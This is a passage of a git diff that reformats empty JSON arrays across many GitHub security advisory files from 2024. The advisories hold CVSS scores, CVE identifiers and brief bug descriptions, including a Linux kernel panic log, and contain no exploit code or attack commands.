a/advisories/unreviewed/2024/04/GHSA-c2wf-8j59-jjhc/GHSA-c2wf-8j59-jjhc.json +++ b/advisories/unreviewed/2024/04/GHSA-c2wf-8j59-jjhc/GHSA-c2wf-8j59-jjhc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-cwg6-2p35-rmg5/GHSA-cwg6-2p35-rmg5.json b/advisories/unreviewed/2024/04/GHSA-cwg6-2p35-rmg5/GHSA-cwg6-2p35-rmg5.json index 3534307314f..f1bfecd6947 100644 --- a/advisories/unreviewed/2024/04/GHSA-cwg6-2p35-rmg5/GHSA-cwg6-2p35-rmg5.json +++ b/advisories/unreviewed/2024/04/GHSA-cwg6-2p35-rmg5/GHSA-cwg6-2p35-rmg5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-fc56-xpwv-3gp9/GHSA-fc56-xpwv-3gp9.json b/advisories/unreviewed/2024/04/GHSA-fc56-xpwv-3gp9/GHSA-fc56-xpwv-3gp9.json index 13715c37c57..7a94b413ba9 100644 --- a/advisories/unreviewed/2024/04/GHSA-fc56-xpwv-3gp9/GHSA-fc56-xpwv-3gp9.json +++ b/advisories/unreviewed/2024/04/GHSA-fc56-xpwv-3gp9/GHSA-fc56-xpwv-3gp9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/04/GHSA-fhx3-mxf6-jxpv/GHSA-fhx3-mxf6-jxpv.json b/advisories/unreviewed/2024/04/GHSA-fhx3-mxf6-jxpv/GHSA-fhx3-mxf6-jxpv.json index 176562ce286..98a8cbbdcc8 100644 --- a/advisories/unreviewed/2024/04/GHSA-fhx3-mxf6-jxpv/GHSA-fhx3-mxf6-jxpv.json +++ b/advisories/unreviewed/2024/04/GHSA-fhx3-mxf6-jxpv/GHSA-fhx3-mxf6-jxpv.json @@ -7,12 +7,8 @@ "CVE-2024-23081" ], "details": "ThreeTen Backport v1.6.8 was discovered to contain a NullPointerException via the component org.threeten.bp.LocalDate::compareTo(ChronoLocalDate).", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/04/GHSA-fr99-9qj2-f73v/GHSA-fr99-9qj2-f73v.json b/advisories/unreviewed/2024/04/GHSA-fr99-9qj2-f73v/GHSA-fr99-9qj2-f73v.json index 7dc48706bf8..f8097f8dd65 100644 --- a/advisories/unreviewed/2024/04/GHSA-fr99-9qj2-f73v/GHSA-fr99-9qj2-f73v.json +++ b/advisories/unreviewed/2024/04/GHSA-fr99-9qj2-f73v/GHSA-fr99-9qj2-f73v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-g734-xxmw-4f5p/GHSA-g734-xxmw-4f5p.json b/advisories/unreviewed/2024/04/GHSA-g734-xxmw-4f5p/GHSA-g734-xxmw-4f5p.json index 7e0763f969f..f175c22d4bd 100644 --- a/advisories/unreviewed/2024/04/GHSA-g734-xxmw-4f5p/GHSA-g734-xxmw-4f5p.json +++ b/advisories/unreviewed/2024/04/GHSA-g734-xxmw-4f5p/GHSA-g734-xxmw-4f5p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-hchx-chqf-7hcp/GHSA-hchx-chqf-7hcp.json b/advisories/unreviewed/2024/04/GHSA-hchx-chqf-7hcp/GHSA-hchx-chqf-7hcp.json index 0a537ff6f7d..c392bbd7d71 100644 --- a/advisories/unreviewed/2024/04/GHSA-hchx-chqf-7hcp/GHSA-hchx-chqf-7hcp.json +++ b/advisories/unreviewed/2024/04/GHSA-hchx-chqf-7hcp/GHSA-hchx-chqf-7hcp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-mfj7-pc34-cqm8/GHSA-mfj7-pc34-cqm8.json b/advisories/unreviewed/2024/04/GHSA-mfj7-pc34-cqm8/GHSA-mfj7-pc34-cqm8.json index 509eb3339fa..4dc98deacd6 100644 --- a/advisories/unreviewed/2024/04/GHSA-mfj7-pc34-cqm8/GHSA-mfj7-pc34-cqm8.json +++ b/advisories/unreviewed/2024/04/GHSA-mfj7-pc34-cqm8/GHSA-mfj7-pc34-cqm8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-pvxf-9mm4-92xf/GHSA-pvxf-9mm4-92xf.json b/advisories/unreviewed/2024/04/GHSA-pvxf-9mm4-92xf/GHSA-pvxf-9mm4-92xf.json index 2cc1c3b38fd..ec5b781277c 100644 --- a/advisories/unreviewed/2024/04/GHSA-pvxf-9mm4-92xf/GHSA-pvxf-9mm4-92xf.json +++ b/advisories/unreviewed/2024/04/GHSA-pvxf-9mm4-92xf/GHSA-pvxf-9mm4-92xf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-qcfj-j39h-f57v/GHSA-qcfj-j39h-f57v.json b/advisories/unreviewed/2024/04/GHSA-qcfj-j39h-f57v/GHSA-qcfj-j39h-f57v.json index 0f82d89f565..7027e9535de 100644 --- a/advisories/unreviewed/2024/04/GHSA-qcfj-j39h-f57v/GHSA-qcfj-j39h-f57v.json +++ b/advisories/unreviewed/2024/04/GHSA-qcfj-j39h-f57v/GHSA-qcfj-j39h-f57v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-qvg5-w5f4-rcwh/GHSA-qvg5-w5f4-rcwh.json b/advisories/unreviewed/2024/04/GHSA-qvg5-w5f4-rcwh/GHSA-qvg5-w5f4-rcwh.json index 7bb27d85901..f9fba16a4a8 100644 --- a/advisories/unreviewed/2024/04/GHSA-qvg5-w5f4-rcwh/GHSA-qvg5-w5f4-rcwh.json +++ b/advisories/unreviewed/2024/04/GHSA-qvg5-w5f4-rcwh/GHSA-qvg5-w5f4-rcwh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-rgx7-8wqv-m224/GHSA-rgx7-8wqv-m224.json b/advisories/unreviewed/2024/04/GHSA-rgx7-8wqv-m224/GHSA-rgx7-8wqv-m224.json index 6a309103b6c..6f899b17d71 100644 --- a/advisories/unreviewed/2024/04/GHSA-rgx7-8wqv-m224/GHSA-rgx7-8wqv-m224.json +++ b/advisories/unreviewed/2024/04/GHSA-rgx7-8wqv-m224/GHSA-rgx7-8wqv-m224.json @@ -7,12 +7,8 @@ "CVE-2024-23082" ], "details": "ThreeTen Backport v1.6.8 was discovered to contain an integer overflow via the component org.threeten.bp.format.DateTimeFormatter::parse(CharSequence, ParsePosition).", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/04/GHSA-vmgj-7wpp-x799/GHSA-vmgj-7wpp-x799.json b/advisories/unreviewed/2024/04/GHSA-vmgj-7wpp-x799/GHSA-vmgj-7wpp-x799.json index 1525652f03a..d0e1de3f847 100644 --- a/advisories/unreviewed/2024/04/GHSA-vmgj-7wpp-x799/GHSA-vmgj-7wpp-x799.json +++ b/advisories/unreviewed/2024/04/GHSA-vmgj-7wpp-x799/GHSA-vmgj-7wpp-x799.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-xc4j-5g39-hrv5/GHSA-xc4j-5g39-hrv5.json b/advisories/unreviewed/2024/04/GHSA-xc4j-5g39-hrv5/GHSA-xc4j-5g39-hrv5.json index 257e3570222..758a5298fac 100644 --- a/advisories/unreviewed/2024/04/GHSA-xc4j-5g39-hrv5/GHSA-xc4j-5g39-hrv5.json +++ b/advisories/unreviewed/2024/04/GHSA-xc4j-5g39-hrv5/GHSA-xc4j-5g39-hrv5.json @@ -7,12 +7,8 @@ "CVE-2024-22717" ], "details": "Cross Site Scripting (XSS) vulnerability in Form Tools 3.1.1 allows attackers to run arbitrary code via the First Name field in the application.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-2qhw-5384-m8g2/GHSA-2qhw-5384-m8g2.json b/advisories/unreviewed/2024/05/GHSA-2qhw-5384-m8g2/GHSA-2qhw-5384-m8g2.json index 8155d0fbc1e..eb6352dbf64 100644 --- a/advisories/unreviewed/2024/05/GHSA-2qhw-5384-m8g2/GHSA-2qhw-5384-m8g2.json +++ b/advisories/unreviewed/2024/05/GHSA-2qhw-5384-m8g2/GHSA-2qhw-5384-m8g2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-4fx7-5ppw-hmcq/GHSA-4fx7-5ppw-hmcq.json b/advisories/unreviewed/2024/05/GHSA-4fx7-5ppw-hmcq/GHSA-4fx7-5ppw-hmcq.json index 2b61859956b..7ab99d43573 100644 --- a/advisories/unreviewed/2024/05/GHSA-4fx7-5ppw-hmcq/GHSA-4fx7-5ppw-hmcq.json +++ b/advisories/unreviewed/2024/05/GHSA-4fx7-5ppw-hmcq/GHSA-4fx7-5ppw-hmcq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-62f3-w8qm-86g2/GHSA-62f3-w8qm-86g2.json b/advisories/unreviewed/2024/05/GHSA-62f3-w8qm-86g2/GHSA-62f3-w8qm-86g2.json index 84e368d543e..425e6c758bb 100644 --- a/advisories/unreviewed/2024/05/GHSA-62f3-w8qm-86g2/GHSA-62f3-w8qm-86g2.json +++ b/advisories/unreviewed/2024/05/GHSA-62f3-w8qm-86g2/GHSA-62f3-w8qm-86g2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-6mjw-gpqr-2788/GHSA-6mjw-gpqr-2788.json b/advisories/unreviewed/2024/05/GHSA-6mjw-gpqr-2788/GHSA-6mjw-gpqr-2788.json index 0a6bacf3ada..866830d7073 100644 --- a/advisories/unreviewed/2024/05/GHSA-6mjw-gpqr-2788/GHSA-6mjw-gpqr-2788.json +++ b/advisories/unreviewed/2024/05/GHSA-6mjw-gpqr-2788/GHSA-6mjw-gpqr-2788.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-7492-64vw-mc4f/GHSA-7492-64vw-mc4f.json b/advisories/unreviewed/2024/05/GHSA-7492-64vw-mc4f/GHSA-7492-64vw-mc4f.json index 9a917e9a9ed..c299fd6368e 100644 --- a/advisories/unreviewed/2024/05/GHSA-7492-64vw-mc4f/GHSA-7492-64vw-mc4f.json +++ b/advisories/unreviewed/2024/05/GHSA-7492-64vw-mc4f/GHSA-7492-64vw-mc4f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-9xx7-rp3v-8694/GHSA-9xx7-rp3v-8694.json b/advisories/unreviewed/2024/05/GHSA-9xx7-rp3v-8694/GHSA-9xx7-rp3v-8694.json index fe6acbd2242..09dbade78ed 100644 --- a/advisories/unreviewed/2024/05/GHSA-9xx7-rp3v-8694/GHSA-9xx7-rp3v-8694.json +++ b/advisories/unreviewed/2024/05/GHSA-9xx7-rp3v-8694/GHSA-9xx7-rp3v-8694.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-cm8p-x6g5-jp9g/GHSA-cm8p-x6g5-jp9g.json b/advisories/unreviewed/2024/05/GHSA-cm8p-x6g5-jp9g/GHSA-cm8p-x6g5-jp9g.json index ffef567d614..83ea47e5449 100644 --- a/advisories/unreviewed/2024/05/GHSA-cm8p-x6g5-jp9g/GHSA-cm8p-x6g5-jp9g.json +++ b/advisories/unreviewed/2024/05/GHSA-cm8p-x6g5-jp9g/GHSA-cm8p-x6g5-jp9g.json @@ -7,12 +7,8 @@ "CVE-2021-47220" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: dwc3: core: fix kernel panic when do reboot\n\nWhen do system reboot, it calls dwc3_shutdown and the whole debugfs\nfor dwc3 has removed first, when the gadget tries to do deinit, and\nremove debugfs for its endpoints, it meets NULL pointer dereference\nissue when call debugfs_lookup. Fix it by removing the whole dwc3\ndebugfs later than dwc3_drd_exit.\n\n[ 2924.958838] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000002\n....\n[ 2925.030994] pstate: 60000005 (nZCv daif -PAN -UAO -TCO BTYPE=--)\n[ 2925.037005] pc : inode_permission+0x2c/0x198\n[ 2925.041281] lr : lookup_one_len_common+0xb0/0xf8\n[ 2925.045903] sp : ffff80001276ba70\n[ 2925.049218] x29: ffff80001276ba70 x28: ffff0000c01f0000 x27: 0000000000000000\n[ 2925.056364] x26: ffff800011791e70 x25: 0000000000000008 x24: dead000000000100\n[ 2925.063510] x23: dead000000000122 x22: 0000000000000000 x21: 0000000000000001\n[ 2925.070652] x20: ffff8000122c6188 x19: 0000000000000000 x18: 0000000000000000\n[ 2925.077797] x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000004\n[ 2925.084943] x14: ffffffffffffffff x13: 0000000000000000 x12: 0000000000000030\n[ 2925.092087] x11: 0101010101010101 x10: 7f7f7f7f7f7f7f7f x9 : ffff8000102b2420\n[ 2925.099232] x8 : 7f7f7f7f7f7f7f7f x7 : feff73746e2f6f64 x6 : 0000000000008080\n[ 2925.106378] x5 : 61c8864680b583eb x4 : 209e6ec2d263dbb7 x3 : 000074756f307065\n[ 2925.113523] x2 : 0000000000000001 x1 : 0000000000000000 x0 : ffff8000122c6188\n[ 2925.120671] Call trace:\n[ 2925.123119] inode_permission+0x2c/0x198\n[ 2925.127042] lookup_one_len_common+0xb0/0xf8\n[ 2925.131315] lookup_one_len_unlocked+0x34/0xb0\n[ 2925.135764] lookup_positive_unlocked+0x14/0x50\n[ 2925.140296] debugfs_lookup+0x68/0xa0\n[ 2925.143964] dwc3_gadget_free_endpoints+0x84/0xb0\n[ 2925.148675] dwc3_gadget_exit+0x28/0x78\n[ 2925.152518] dwc3_drd_exit+0x100/0x1f8\n[ 2925.156267] dwc3_remove+0x11c/0x120\n[ 2925.159851] dwc3_shutdown+0x14/0x20\n[ 2925.163432] platform_shutdown+0x28/0x38\n[ 2925.167360] device_shutdown+0x15c/0x378\n[ 2925.171291] kernel_restart_prepare+0x3c/0x48\n[ 2925.175650] kernel_restart+0x1c/0x68\n[ 2925.179316] __do_sys_reboot+0x218/0x240\n[ 2925.183247] __arm64_sys_reboot+0x28/0x30\n[ 2925.187262] invoke_syscall+0x48/0x100\n[ 2925.191017] el0_svc_common.constprop.0+0x48/0xc8\n[ 2925.195726] do_el0_svc+0x28/0x88\n[ 2925.199045] el0_svc+0x20/0x30\n[ 2925.202104] el0_sync_handler+0xa8/0xb0\n[ 2925.205942] el0_sync+0x148/0x180\n[ 2925.209270] Code: a9025bf5 2a0203f5 121f0056 370802b5 (79400660)\n[ 2925.215372] ---[ end trace 124254d8e485a58b ]---\n[ 2925.220012] Kernel panic - not syncing: Attempted to kill init! exitcode=0x0000000b\n[ 2925.227676] Kernel Offset: disabled\n[ 2925.231164] CPU features: 0x00001001,20000846\n[ 2925.235521] Memory Limit: none\n[ 2925.238580] ---[ end Kernel panic - not syncing: Attempted to kill init! exitcode=0x0000000b ]---\n\n(cherry picked from commit 2a042767814bd0edf2619f06fecd374e266ea068)", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-fc59-42wx-gcfm/GHSA-fc59-42wx-gcfm.json b/advisories/unreviewed/2024/05/GHSA-fc59-42wx-gcfm/GHSA-fc59-42wx-gcfm.json index ca91b6314cc..ef0daff6839 100644 --- a/advisories/unreviewed/2024/05/GHSA-fc59-42wx-gcfm/GHSA-fc59-42wx-gcfm.json +++ b/advisories/unreviewed/2024/05/GHSA-fc59-42wx-gcfm/GHSA-fc59-42wx-gcfm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-h2fc-m4gm-6mg8/GHSA-h2fc-m4gm-6mg8.json b/advisories/unreviewed/2024/05/GHSA-h2fc-m4gm-6mg8/GHSA-h2fc-m4gm-6mg8.json index 1fa050203a6..74a5a7c582f 100644 --- a/advisories/unreviewed/2024/05/GHSA-h2fc-m4gm-6mg8/GHSA-h2fc-m4gm-6mg8.json +++ b/advisories/unreviewed/2024/05/GHSA-h2fc-m4gm-6mg8/GHSA-h2fc-m4gm-6mg8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-h453-7rrx-q6j5/GHSA-h453-7rrx-q6j5.json b/advisories/unreviewed/2024/05/GHSA-h453-7rrx-q6j5/GHSA-h453-7rrx-q6j5.json index aa96f0dad4d..9d8e8150bcb 100644 --- a/advisories/unreviewed/2024/05/GHSA-h453-7rrx-q6j5/GHSA-h453-7rrx-q6j5.json +++ b/advisories/unreviewed/2024/05/GHSA-h453-7rrx-q6j5/GHSA-h453-7rrx-q6j5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-jpvc-w686-44qr/GHSA-jpvc-w686-44qr.json b/advisories/unreviewed/2024/05/GHSA-jpvc-w686-44qr/GHSA-jpvc-w686-44qr.json index fed829561ec..76b68259f60 100644 --- a/advisories/unreviewed/2024/05/GHSA-jpvc-w686-44qr/GHSA-jpvc-w686-44qr.json +++ b/advisories/unreviewed/2024/05/GHSA-jpvc-w686-44qr/GHSA-jpvc-w686-44qr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-m78v-2mx6-xmm7/GHSA-m78v-2mx6-xmm7.json b/advisories/unreviewed/2024/05/GHSA-m78v-2mx6-xmm7/GHSA-m78v-2mx6-xmm7.json index 327375f401d..afc3ae2e038 100644 --- a/advisories/unreviewed/2024/05/GHSA-m78v-2mx6-xmm7/GHSA-m78v-2mx6-xmm7.json +++ b/advisories/unreviewed/2024/05/GHSA-m78v-2mx6-xmm7/GHSA-m78v-2mx6-xmm7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-mpcf-6x99-gw9r/GHSA-mpcf-6x99-gw9r.json b/advisories/unreviewed/2024/05/GHSA-mpcf-6x99-gw9r/GHSA-mpcf-6x99-gw9r.json index 9dbfff5dbe7..e5029dc2182 100644 --- a/advisories/unreviewed/2024/05/GHSA-mpcf-6x99-gw9r/GHSA-mpcf-6x99-gw9r.json +++ b/advisories/unreviewed/2024/05/GHSA-mpcf-6x99-gw9r/GHSA-mpcf-6x99-gw9r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-qr27-wgh8-6hcg/GHSA-qr27-wgh8-6hcg.json b/advisories/unreviewed/2024/05/GHSA-qr27-wgh8-6hcg/GHSA-qr27-wgh8-6hcg.json index 80a625b1078..6066099e971 100644 --- a/advisories/unreviewed/2024/05/GHSA-qr27-wgh8-6hcg/GHSA-qr27-wgh8-6hcg.json +++ b/advisories/unreviewed/2024/05/GHSA-qr27-wgh8-6hcg/GHSA-qr27-wgh8-6hcg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-r6p6-7q5h-jc4x/GHSA-r6p6-7q5h-jc4x.json b/advisories/unreviewed/2024/05/GHSA-r6p6-7q5h-jc4x/GHSA-r6p6-7q5h-jc4x.json index 062ad852f6f..8ccaed5a63e 100644 --- a/advisories/unreviewed/2024/05/GHSA-r6p6-7q5h-jc4x/GHSA-r6p6-7q5h-jc4x.json +++ b/advisories/unreviewed/2024/05/GHSA-r6p6-7q5h-jc4x/GHSA-r6p6-7q5h-jc4x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-v3j6-jv37-286j/GHSA-v3j6-jv37-286j.json b/advisories/unreviewed/2024/05/GHSA-v3j6-jv37-286j/GHSA-v3j6-jv37-286j.json index 20307ac143f..9701fce79d1 100644 --- a/advisories/unreviewed/2024/05/GHSA-v3j6-jv37-286j/GHSA-v3j6-jv37-286j.json +++ b/advisories/unreviewed/2024/05/GHSA-v3j6-jv37-286j/GHSA-v3j6-jv37-286j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-w3rx-jq2m-66pw/GHSA-w3rx-jq2m-66pw.json b/advisories/unreviewed/2024/05/GHSA-w3rx-jq2m-66pw/GHSA-w3rx-jq2m-66pw.json index e9c6074c3f5..33c1e32e262 100644 --- a/advisories/unreviewed/2024/05/GHSA-w3rx-jq2m-66pw/GHSA-w3rx-jq2m-66pw.json +++ b/advisories/unreviewed/2024/05/GHSA-w3rx-jq2m-66pw/GHSA-w3rx-jq2m-66pw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-wwjj-qw24-qw82/GHSA-wwjj-qw24-qw82.json b/advisories/unreviewed/2024/05/GHSA-wwjj-qw24-qw82/GHSA-wwjj-qw24-qw82.json index 043d667ed00..aee354e8745 100644 --- a/advisories/unreviewed/2024/05/GHSA-wwjj-qw24-qw82/GHSA-wwjj-qw24-qw82.json +++ b/advisories/unreviewed/2024/05/GHSA-wwjj-qw24-qw82/GHSA-wwjj-qw24-qw82.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-xj74-qf7m-54cx/GHSA-xj74-qf7m-54cx.json b/advisories/unreviewed/2024/05/GHSA-xj74-qf7m-54cx/GHSA-xj74-qf7m-54cx.json index ee10c759a61..61bba8d5e9a 100644 --- a/advisories/unreviewed/2024/05/GHSA-xj74-qf7m-54cx/GHSA-xj74-qf7m-54cx.json +++ b/advisories/unreviewed/2024/05/GHSA-xj74-qf7m-54cx/GHSA-xj74-qf7m-54cx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/06/GHSA-22v3-6wxv-73wp/GHSA-22v3-6wxv-73wp.json b/advisories/unreviewed/2024/06/GHSA-22v3-6wxv-73wp/GHSA-22v3-6wxv-73wp.json index fc51dce6cfa..70a71d0aa74 100644 --- a/advisories/unreviewed/2024/06/GHSA-22v3-6wxv-73wp/GHSA-22v3-6wxv-73wp.json +++ b/advisories/unreviewed/2024/06/GHSA-22v3-6wxv-73wp/GHSA-22v3-6wxv-73wp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/06/GHSA-2g2h-672j-8vfh/GHSA-2g2h-672j-8vfh.json b/advisories/unreviewed/2024/06/GHSA-2g2h-672j-8vfh/GHSA-2g2h-672j-8vfh.json index 21eb75f1847..1db788d6af4 100644 --- a/advisories/unreviewed/2024/06/GHSA-2g2h-672j-8vfh/GHSA-2g2h-672j-8vfh.json +++ b/advisories/unreviewed/2024/06/GHSA-2g2h-672j-8vfh/GHSA-2g2h-672j-8vfh.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/06/GHSA-55vx-7w9x-7vxc/GHSA-55vx-7w9x-7vxc.json b/advisories/unreviewed/2024/06/GHSA-55vx-7w9x-7vxc/GHSA-55vx-7w9x-7vxc.json index e65db81cfdf..6966b36dfc8 100644 --- a/advisories/unreviewed/2024/06/GHSA-55vx-7w9x-7vxc/GHSA-55vx-7w9x-7vxc.json +++ b/advisories/unreviewed/2024/06/GHSA-55vx-7w9x-7vxc/GHSA-55vx-7w9x-7vxc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ 